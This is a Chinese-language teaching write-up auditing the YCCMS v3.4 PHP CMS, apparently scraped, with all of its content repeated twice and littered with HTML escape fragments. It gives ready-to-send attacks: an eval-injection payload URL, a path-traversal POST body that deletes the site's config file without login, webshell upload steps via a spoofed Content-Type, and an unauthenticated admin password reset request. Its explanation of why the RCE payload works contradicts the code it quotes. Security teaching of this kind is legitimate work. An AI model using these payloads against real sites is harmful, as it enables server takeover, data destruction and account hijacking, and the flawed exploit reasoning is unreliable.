YCCMS v3.4 代码审计教学文档<\/strong><\/h2>
一、程序概述<\/strong><\/h3>
程序名称<\/strong>： YCCMS v3.4
架构模式<\/strong>： MVC（Model-View-Controller）模式
审计重点<\/strong>：代码审计旨在发现程序源代码中存在的安全漏洞，如远程代码执行、文件删除、未授权访问等。<\/p>
二、核心文件结构与功能分析<\/strong><\/h3>
理解文件结构是代码审计的第一步，有助于定位关键功能点。<\/p>

文件路径<\/th> 类型\/角色<\/th> 核心功能与安全关注点<\/th> <\/tr> <\/thead>

\/admin\/index.php<\/code><\/td> 入口文件<\/strong><\/td> 后台主入口。通过require<\/code>引入\/config\/run.inc.php<\/code>完成初始化。<\/td> <\/tr>
\/config\/run.inc.php<\/code><\/td> 初始化文件<\/strong><\/td> 开启Session、设置编码、引入配置和模板引擎、自动加载类、执行单入口模式：Factory::setAction()->run();<\/code>。这是RCE漏洞的触发起点。<\/strong><\/td> <\/tr>
\/config\/config.inc.php<\/code><\/td> 配置文件<\/strong><\/td> 包含数据库连接信息、系统配置等。需检查是否存在敏感信息泄露。<\/td> <\/tr>
\/controller\/Action.class.php<\/code><\/td> 控制器基类<\/strong><\/td> 所有控制器的父类。其run()<\/code>方法存在高危远程代码执行（RCE）漏洞<\/strong>。<\/td> <\/tr>
\/controller\/AdminAction.class.php<\/code><\/td> 管理员控制器<\/strong><\/td> 管理后台首页、更改密码（使用不安全的sha1加密）、显示系统信息。<\/td> <\/tr>
\/controller\/PicAction.class.php<\/code><\/td> 图片控制器<\/strong><\/td> 管理上传的图片。存在未授权访问<\/strong>和任意文件删除漏洞<\/strong>。<\/td> <\/tr>
\/controller\/CallAction.class.php<\/code><\/td> 功能控制器<\/strong><\/td> 处理验证码、文件上传。存在任意文件上传漏洞<\/strong>。<\/td> <\/tr>
\/controller\/LoginAction.class.php<\/code><\/td> 登录控制器<\/strong><\/td> 处理用户登录，使用sha1验证密码，包含验证码校验和“记住密码”功能。<\/td> <\/tr>
\/public\/class\/Factory.class.php<\/code><\/td> 工厂类<\/strong><\/td> 负责创建控制器对象。其setAction()<\/code>方法是绕过安全检查并触发RCE的关键。<\/td> <\/tr> <\/tbody> <\/table> 三、关键漏洞深度剖析与复现<\/strong><\/h3> 漏洞1：远程代码执行（RCE）<\/strong><\/h4> 漏洞文件<\/strong>： \/controller\/Action.class.php<\/code><\/p> 漏洞代码<\/strong>：<\/p> public<\/span> function<\/span> run<\/span>() { <\/span><\/span> $_m =<\/span> isset<\/span>($_GET['m'<\/span>]) ?<\/span> $_GET['m'<\/span>] :<\/span> 'index'<\/span>; \/\/ 获取URL中的'm'参数 <\/span><\/span><\/span><\/span> method_exists<\/span>($this, $_m) ?<\/span> eval<\/span>('$this->'<\/span>.<\/span>$_m.<\/span>'();'<\/span>) :<\/span> $this-><\/span>index<\/span>(); <\/span><\/span> \/\/ 使用eval()动态执行方法，此处$_m完全可控，导致代码执行。 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞成因<\/strong>：<\/p> eval()<\/code> 函数直接执行字符串形式的PHP代码。<\/li> 参数 $_m<\/code> 来自用户输入的 $_GET['m']<\/code>，未经严格过滤。<\/li> 攻击者可以构造恶意参数，注入任意PHP代码。<\/li> <\/ol> 漏洞利用链分析<\/strong>：仅仅直接访问Action.class.php<\/code>是无法利用的，需要找到一个能调用到它的run()<\/code>方法的地方。利用链如下：<\/p> 触发点<\/strong>： \/config\/run.inc.php<\/code> 中的一行代码 Factory::setAction()->run();<\/code>。<\/li> 绕过检查<\/strong>：查看 Factory.class.php<\/code> 的 setAction()<\/code> 方法。 static<\/span> public<\/span> function<\/span> setAction<\/span>(){ <\/span><\/span> $_a =<\/span> self<\/span>::<\/span>getA<\/span>(); \/\/ 从URL获取'a'参数，例如 ?a=admin <\/span><\/span><\/span><\/span> \/\/ ... 进行一些控制器名的安全检查 ... <\/span><\/span><\/span><\/span> if<\/span> (!<\/span>file_exists<\/span>(ROOT_PATH<\/span>.<\/span>'\/controller\/'<\/span>.<\/span>ucfirst<\/span>($_a).<\/span>'Action.class.php'<\/span>)) $_a =<\/span> 'Login'<\/span>; <\/span><\/span> eval<\/span>('self::$_obj = new '<\/span>.<\/span>ucfirst<\/span>($_a).<\/span>'Action();'<\/span>); \/\/ 动态实例化控制器 <\/span><\/span><\/span><\/span> return<\/span> self<\/span>::<\/span>$_obj; <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> 构造POC<\/strong>：目标是让 Factory::setAction()<\/code> 实例化一个不存在的控制器，从而触发 Action<\/code> 基类的 run()<\/code> 方法，并让 $_m<\/code> 参数执行我们的代码。思路<\/strong>：利用 file_exists()<\/code> 函数的特性，它允许路径中包含\/..\/<\/code>这样的目录遍历字符。<\/li> Payload<\/strong>： http:\/\/yccms-site.com\/admin\/?a=Factory();phpinfo();\/\/..\/<\/code><\/li> 解释<\/strong>： a=Factory();phpinfo();\/\/..\/<\/code> 传递给 setAction()<\/code> 方法。<\/li> file_exists(...\/controller\/Factory();phpinfo();\/\/..\/Action.class.php)<\/code> 会进行路径解析，\/\/..\/<\/code> 会使得路径回退到上级目录，最终可能检查一个不存在的文件，返回 false<\/code>。<\/li> 由于文件不存在，$_a<\/code> 被赋值为 'Login'<\/code>，但关键的一步<\/strong>是，在检查之前，原始的 $_a<\/code> 已经被拼接进了 eval<\/code> 语句：eval('self::$_obj = new '.ucfirst($_a).'Action();');<\/code><\/li> 这行代码变成了：eval('self::$_obj = new Factory();phpinfo();\/\/..\/Action();');<\/code><\/li> 这相当于执行了：new Factory(); phpinfo(); \/\/ ..\/Action();<\/code> （\/\/<\/code>是注释，后面代码无效）<\/li> 因此，phpinfo()<\/code> 函数就被成功执行了。<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 漏洞2：任意文件删除<\/strong><\/h4> 漏洞文件<\/strong>： \/controller\/PicAction.class.php<\/code> 中的 delall()<\/code> 方法。<\/p> 漏洞代码<\/strong>：<\/p> public<\/span> function<\/span> delall<\/span>(){ <\/span><\/span> if<\/span>(isset<\/span>($_POST['send'<\/span>])){ <\/span><\/span> ...<\/span> <\/span><\/span> $_fileDir =<\/span> ROOT_PATH<\/span>.<\/span>'\/uploads\/'<\/span>; \/\/ 基础目录 <\/span><\/span><\/span><\/span> foreach<\/span>($_POST['pid'<\/span>] as<\/span> $_value){ \/\/ 遍历用户提交的文件名数组 <\/span><\/span><\/span><\/span> $_filePath =<\/span> $_fileDir .<\/span> $_value; \/\/ 直接拼接路径 <\/span><\/span><\/span><\/span> if<\/span>(!<\/span>unlink<\/span>($_filePath)){ \/\/ 删除文件 <\/span><\/span><\/span><\/span> ...<\/span> <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞成因<\/strong>：<\/p> 该功能没有验证用户登录状态<\/strong>，导致未授权访问。<\/li> 在拼接文件路径时，直接使用用户输入的 $_value<\/code>，未做任何过滤。<\/li> 攻击者可以通过路径遍历（..\/<\/code>）跳转到任意目录，删除任意文件。<\/li> <\/ol> 复现步骤<\/strong>：<\/p> 访问图片管理页面：http:\/\/yccms-site.com\/admin\/?a=pic<\/code> （即使未登录也可能访问）。<\/li> 选择一张图片进行删除，并抓取HTTP请求包。<\/li> 修改POST数据，进行路径遍历攻击。原始数据<\/strong>： pid[0]=1.png&chkall=on&send=删除选中图片<\/code><\/li> 恶意POC<\/strong>： pid[0]=..\/..\/..\/config\/config.inc.php&chkall=on&send=删除选中图片<\/code><\/li> URL编码后<\/strong>： pid%5B0%5D=..\/..\/..\/config\/config.inc.php&chkall=on&send=%E5%88%A0%E9%99%A4%E9%80%89%E4%B8%AD%E5%9B%BE%E7%89%87<\/code><\/li> <\/ul> <\/li> 发送请求，即可删除根目录下的 config.inc.php<\/code> 文件（可能包含数据库密码）。<\/li> <\/ol> 漏洞3：任意文件上传<\/strong><\/h4> 漏洞文件<\/strong>： \/controller\/CallAction.class.php<\/code> 中的 upLoad()<\/code> 和 xhUp()<\/code> 方法。<\/p> 漏洞成因<\/strong>：这两个上传功能仅通过检查 $_FILES['file']['type']<\/code>（即客户端传来的Content-Type）来判断文件类型，而不是检查文件真实内容（如文件头Magic Number）。攻击者可以轻易伪造Content-Type来上传PHP等恶意文件。<\/p> 复现步骤<\/strong>：<\/p> 准备一个名为 shell.php<\/code> 的Webshell。<\/li> 使用Burp Suite等工具拦截上传请求。<\/li> 将请求中的 Content-Type<\/code> 修改为 image\/jpeg<\/code> 或 image\/png<\/code>。<\/li> 放行请求，即可成功上传PHP文件，从而获取服务器控制权。<\/li> <\/ol> 漏洞4：未授权更改管理员密码<\/strong><\/h4> 漏洞文件<\/strong>： \/controller\/AdminAction.class.php<\/code> 中的 update()<\/code> 方法。<\/p> 漏洞成因<\/strong>：该功能用于修改管理员密码，但代码中缺乏对当前用户会话（Session）的有效验证<\/strong>。虽然页面可能通过检查 $_SESSION['admin']<\/code> 来显示，但处理表单提交的 update()<\/code> 方法本身没有再次验证，导致攻击者可以直接提交POST请求修改密码。<\/p> 复现步骤<\/strong>：<\/p> 构造一个POST请求，直接发送到 http:\/\/yccms-site.com\/admin\/?a=admin&m=update<\/code>。<\/li> POST数据包含新的用户名和密码：username=hacker&password=newpassword&notpassword=newpassword&send=submit<\/code>。<\/li> 请求成功后，数据库中ID为1的管理员账号密码即被修改，攻击者可以使用新密码登录后台。<\/li> <\/ol> 四、知识点总结<\/strong><\/h3> PHP安全函数<\/strong>：<\/p> eval()<\/code>：极度危险<\/strong>，应避免使用。如果必须使用，必须对输入进行严格的白名单过滤。<\/li> unlink()<\/code>：删除文件时，必须确保文件路径是受控的，防止路径遍历。<\/li> file_exists()<\/code>：可用于安全检查，但要注意其路径解析逻辑可能被绕过。<\/li> <\/ul> <\/li> 加密与安全<\/strong>：<\/p> SHA1<\/strong> 已被证明是不安全的哈希算法，对于密码存储，应使用 password_hash()<\/code> 函数。<\/li> <\/ul> <\/li> 输入验证<\/strong>：<\/p> 永远不要信任用户输入<\/strong>。对所有来自客户端（GET, POST, COOKIE）的数据都必须进行验证和过滤。<\/li> 文件上传应检查文件扩展名和文件内容头<\/strong>，并将文件存储在Web目录之外，或通过脚本间接访问。<\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 所有后台功能必须在操作前验证用户登录状态和权限（isset($_SESSION['admin'])<\/code>），最好在基类构造函数中统一处理。<\/li> <\/ul> <\/li> MVC架构审计要点<\/strong>：<\/p> 控制器（Controller）<\/strong>：重点关注用户输入的处理、权限验证、逻辑流程。<\/li> 模型（Model）<\/strong>：重点关注SQL语句的拼接，防止SQL注入。<\/li> 视图（View）<\/strong>：重点关注输出是否经过转义，防止XSS。<\/li> <\/ul> <\/li> <\/ol> 通过本次对YCCMS的审计，我们可以清晰地看到，即使是简单的MVC框架，如果开发者在安全意识上存在疏忽，也会导致严重的安全问题。代码审计的核心思路就是 “追踪用户输入”<\/strong> 和 “验证安全边界”<\/strong>。<\/p>

文件路径<\/th>	类型\/角色<\/th>	核心功能与安全关注点<\/th> <\/tr> <\/thead>
`\/admin\/index.php<\/code><\/td>`	入口文件<\/strong><\/td>	后台主入口。通过`require<\/code>引入\/config\/run.inc.php<\/code>完成初始化。<\/td> <\/tr>`
`\/config\/run.inc.php<\/code><\/td>`	初始化文件<\/strong><\/td>	开启Session、设置编码、引入配置和模板引擎、自动加载类、执行单入口模式：`Factory::setAction()->run();<\/code>。这是RCE漏洞的触发起点。<\/strong><\/td> <\/tr>`
`\/config\/config.inc.php<\/code><\/td>`	配置文件<\/strong><\/td>	包含数据库连接信息、系统配置等。需检查是否存在敏感信息泄露。<\/td> <\/tr>
`\/controller\/Action.class.php<\/code><\/td>`	控制器基类<\/strong><\/td>	所有控制器的父类。其`run()<\/code>方法存在高危远程代码执行（RCE）漏洞<\/strong>。<\/td> <\/tr>`
`\/controller\/AdminAction.class.php<\/code><\/td>`	管理员控制器<\/strong><\/td>	管理后台首页、更改密码（使用不安全的sha1加密）、显示系统信息。<\/td> <\/tr>
`\/controller\/PicAction.class.php<\/code><\/td>`	图片控制器<\/strong><\/td>	管理上传的图片。存在未授权访问<\/strong>和任意文件删除漏洞<\/strong>。<\/td> <\/tr>
`\/controller\/CallAction.class.php<\/code><\/td>`	功能控制器<\/strong><\/td>	处理验证码、文件上传。存在任意文件上传漏洞<\/strong>。<\/td> <\/tr>
`\/controller\/LoginAction.class.php<\/code><\/td>`	登录控制器<\/strong><\/td>	处理用户登录，使用sha1验证密码，包含验证码校验和“记住密码”功能。<\/td> <\/tr>
`\/public\/class\/Factory.class.php<\/code><\/td>`	工厂类<\/strong><\/td>	负责创建控制器对象。其setAction()<\/code>方法是绕过安全检查并触发RCE的关键。<\/td> <\/tr> <\/tbody> <\/table> 三、关键漏洞深度剖析与复现<\/strong><\/h3> 漏洞1：远程代码执行（RCE）<\/strong><\/h4> 漏洞文件<\/strong>： \/controller\/Action.class.php<\/code><\/p> 漏洞代码<\/strong>：<\/p> public<\/span> function<\/span> run<\/span>() { <\/span><\/span> $_m =<\/span> isset<\/span>($_GET['m'<\/span>]) ?<\/span> $_GET['m'<\/span>] :<\/span> 'index'<\/span>; \/\/ 获取URL中的'm'参数 <\/span><\/span><\/span><\/span> method_exists<\/span>($this, $_m) ?<\/span> eval<\/span>('$this->'<\/span>.<\/span>$_m.<\/span>'();'<\/span>) :<\/span> $this-><\/span>index<\/span>(); <\/span><\/span> \/\/ 使用eval()动态执行方法，此处$_m完全可控，导致代码执行。 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞成因<\/strong>：<\/p> eval()<\/code> 函数直接执行字符串形式的PHP代码。<\/li> 参数 $_m<\/code> 来自用户输入的 $_GET['m']<\/code>，未经严格过滤。<\/li> 攻击者可以构造恶意参数，注入任意PHP代码。<\/li> <\/ol> 漏洞利用链分析<\/strong>：仅仅直接访问Action.class.php<\/code>是无法利用的，需要找到一个能调用到它的run()<\/code>方法的地方。利用链如下：<\/p> 触发点<\/strong>： \/config\/run.inc.php<\/code> 中的一行代码 Factory::setAction()->run();<\/code>。<\/li> 绕过检查<\/strong>：查看 Factory.class.php<\/code> 的 setAction()<\/code> 方法。 static<\/span> public<\/span> function<\/span> setAction<\/span>(){ <\/span><\/span> $_a =<\/span> self<\/span>::<\/span>getA<\/span>(); \/\/ 从URL获取'a'参数，例如 ?a=admin <\/span><\/span><\/span><\/span> \/\/ ... 进行一些控制器名的安全检查 ... <\/span><\/span><\/span><\/span> if<\/span> (!<\/span>file_exists<\/span>(ROOT_PATH<\/span>.<\/span>'\/controller\/'<\/span>.<\/span>ucfirst<\/span>($_a).<\/span>'Action.class.php'<\/span>)) $_a =<\/span> 'Login'<\/span>; <\/span><\/span> eval<\/span>('self::$_obj = new '<\/span>.<\/span>ucfirst<\/span>($_a).<\/span>'Action();'<\/span>); \/\/ 动态实例化控制器 <\/span><\/span><\/span><\/span> return<\/span> self<\/span>::<\/span>$_obj; <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> 构造POC<\/strong>：目标是让 Factory::setAction()<\/code> 实例化一个不存在的控制器，从而触发 Action<\/code> 基类的 run()<\/code> 方法，并让 $_m<\/code> 参数执行我们的代码。思路<\/strong>：利用 file_exists()<\/code> 函数的特性，它允许路径中包含\/..\/<\/code>这样的目录遍历字符。<\/li> Payload<\/strong>： http:\/\/yccms-site.com\/admin\/?a=Factory();phpinfo();\/\/..\/<\/code><\/li> 解释<\/strong>： a=Factory();phpinfo();\/\/..\/<\/code> 传递给 setAction()<\/code> 方法。<\/li> file_exists(...\/controller\/Factory();phpinfo();\/\/..\/Action.class.php)<\/code> 会进行路径解析，\/\/..\/<\/code> 会使得路径回退到上级目录，最终可能检查一个不存在的文件，返回 false<\/code>。<\/li> 由于文件不存在，$_a<\/code> 被赋值为 'Login'<\/code>，但关键的一步<\/strong>是，在检查之前，原始的 $_a<\/code> 已经被拼接进了 eval<\/code> 语句：eval('self::$_obj = new '.ucfirst($_a).'Action();');<\/code><\/li> 这行代码变成了：eval('self::$_obj = new Factory();phpinfo();\/\/..\/Action();');<\/code><\/li> 这相当于执行了：new Factory(); phpinfo(); \/\/ ..\/Action();<\/code> （\/\/<\/code>是注释，后面代码无效）<\/li> 因此，phpinfo()<\/code> 函数就被成功执行了。<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 漏洞2：任意文件删除<\/strong><\/h4> 漏洞文件<\/strong>： \/controller\/PicAction.class.php<\/code> 中的 delall()<\/code> 方法。<\/p> 漏洞代码<\/strong>：<\/p> public<\/span> function<\/span> delall<\/span>(){ <\/span><\/span> if<\/span>(isset<\/span>($_POST['send'<\/span>])){ <\/span><\/span> ...<\/span> <\/span><\/span> $_fileDir =<\/span> ROOT_PATH<\/span>.<\/span>'\/uploads\/'<\/span>; \/\/ 基础目录 <\/span><\/span><\/span><\/span> foreach<\/span>($_POST['pid'<\/span>] as<\/span> $_value){ \/\/ 遍历用户提交的文件名数组 <\/span><\/span><\/span><\/span> $_filePath =<\/span> $_fileDir .<\/span> $_value; \/\/ 直接拼接路径 <\/span><\/span><\/span><\/span> if<\/span>(!<\/span>unlink<\/span>($_filePath)){ \/\/ 删除文件 <\/span><\/span><\/span><\/span> ...<\/span> <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞成因<\/strong>：<\/p> 该功能没有验证用户登录状态<\/strong>，导致未授权访问。<\/li> 在拼接文件路径时，直接使用用户输入的 $_value<\/code>，未做任何过滤。<\/li> 攻击者可以通过路径遍历（..\/<\/code>）跳转到任意目录，删除任意文件。<\/li> <\/ol> 复现步骤<\/strong>：<\/p> 访问图片管理页面：http:\/\/yccms-site.com\/admin\/?a=pic<\/code> （即使未登录也可能访问）。<\/li> 选择一张图片进行删除，并抓取HTTP请求包。<\/li> 修改POST数据，进行路径遍历攻击。原始数据<\/strong>： pid[0]=1.png&chkall=on&send=删除选中图片<\/code><\/li> 恶意POC<\/strong>： pid[0]=..\/..\/..\/config\/config.inc.php&chkall=on&send=删除选中图片<\/code><\/li> URL编码后<\/strong>： pid%5B0%5D=..\/..\/..\/config\/config.inc.php&chkall=on&send=%E5%88%A0%E9%99%A4%E9%80%89%E4%B8%AD%E5%9B%BE%E7%89%87<\/code><\/li> <\/ul> <\/li> 发送请求，即可删除根目录下的 config.inc.php<\/code> 文件（可能包含数据库密码）。<\/li> <\/ol> 漏洞3：任意文件上传<\/strong><\/h4> 漏洞文件<\/strong>： \/controller\/CallAction.class.php<\/code> 中的 upLoad()<\/code> 和 xhUp()<\/code> 方法。<\/p> 漏洞成因<\/strong>：这两个上传功能仅通过检查 $_FILES['file']['type']<\/code>（即客户端传来的Content-Type）来判断文件类型，而不是检查文件真实内容（如文件头Magic Number）。攻击者可以轻易伪造Content-Type来上传PHP等恶意文件。<\/p> 复现步骤<\/strong>：<\/p> 准备一个名为 shell.php<\/code> 的Webshell。<\/li> 使用Burp Suite等工具拦截上传请求。<\/li> 将请求中的 Content-Type<\/code> 修改为 image\/jpeg<\/code> 或 image\/png<\/code>。<\/li> 放行请求，即可成功上传PHP文件，从而获取服务器控制权。<\/li> <\/ol> 漏洞4：未授权更改管理员密码<\/strong><\/h4> 漏洞文件<\/strong>： \/controller\/AdminAction.class.php<\/code> 中的 update()<\/code> 方法。<\/p> 漏洞成因<\/strong>：该功能用于修改管理员密码，但代码中缺乏对当前用户会话（Session）的有效验证<\/strong>。虽然页面可能通过检查 $_SESSION['admin']<\/code> 来显示，但处理表单提交的 update()<\/code> 方法本身没有再次验证，导致攻击者可以直接提交POST请求修改密码。<\/p> 复现步骤<\/strong>：<\/p> 构造一个POST请求，直接发送到 http:\/\/yccms-site.com\/admin\/?a=admin&m=update<\/code>。<\/li> POST数据包含新的用户名和密码：username=hacker&password=newpassword&notpassword=newpassword&send=submit<\/code>。<\/li> 请求成功后，数据库中ID为1的管理员账号密码即被修改，攻击者可以使用新密码登录后台。<\/li> <\/ol> 四、知识点总结<\/strong><\/h3> PHP安全函数<\/strong>：<\/p> eval()<\/code>：极度危险<\/strong>，应避免使用。如果必须使用，必须对输入进行严格的白名单过滤。<\/li> unlink()<\/code>：删除文件时，必须确保文件路径是受控的，防止路径遍历。<\/li> file_exists()<\/code>：可用于安全检查，但要注意其路径解析逻辑可能被绕过。<\/li> <\/ul> <\/li> 加密与安全<\/strong>：<\/p> SHA1<\/strong> 已被证明是不安全的哈希算法，对于密码存储，应使用 password_hash()<\/code> 函数。<\/li> <\/ul> <\/li> 输入验证<\/strong>：<\/p> 永远不要信任用户输入<\/strong>。对所有来自客户端（GET, POST, COOKIE）的数据都必须进行验证和过滤。<\/li> 文件上传应检查文件扩展名和文件内容头<\/strong>，并将文件存储在Web目录之外，或通过脚本间接访问。<\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 所有后台功能必须在操作前验证用户登录状态和权限（isset($_SESSION['admin'])<\/code>），最好在基类构造函数中统一处理。<\/li> <\/ul> <\/li> MVC架构审计要点<\/strong>：<\/p> 控制器（Controller）<\/strong>：重点关注用户输入的处理、权限验证、逻辑流程。<\/li> 模型（Model）<\/strong>：重点关注SQL语句的拼接，防止SQL注入。<\/li> 视图（View）<\/strong>：重点关注输出是否经过转义，防止XSS。<\/li> <\/ul> <\/li> <\/ol> 通过本次对YCCMS的审计，我们可以清晰地看到，即使是简单的MVC框架，如果开发者在安全意识上存在疏忽，也会导致严重的安全问题。代码审计的核心思路就是 “追踪用户输入”<\/strong> 和 “验证安全边界”<\/strong>。<\/p>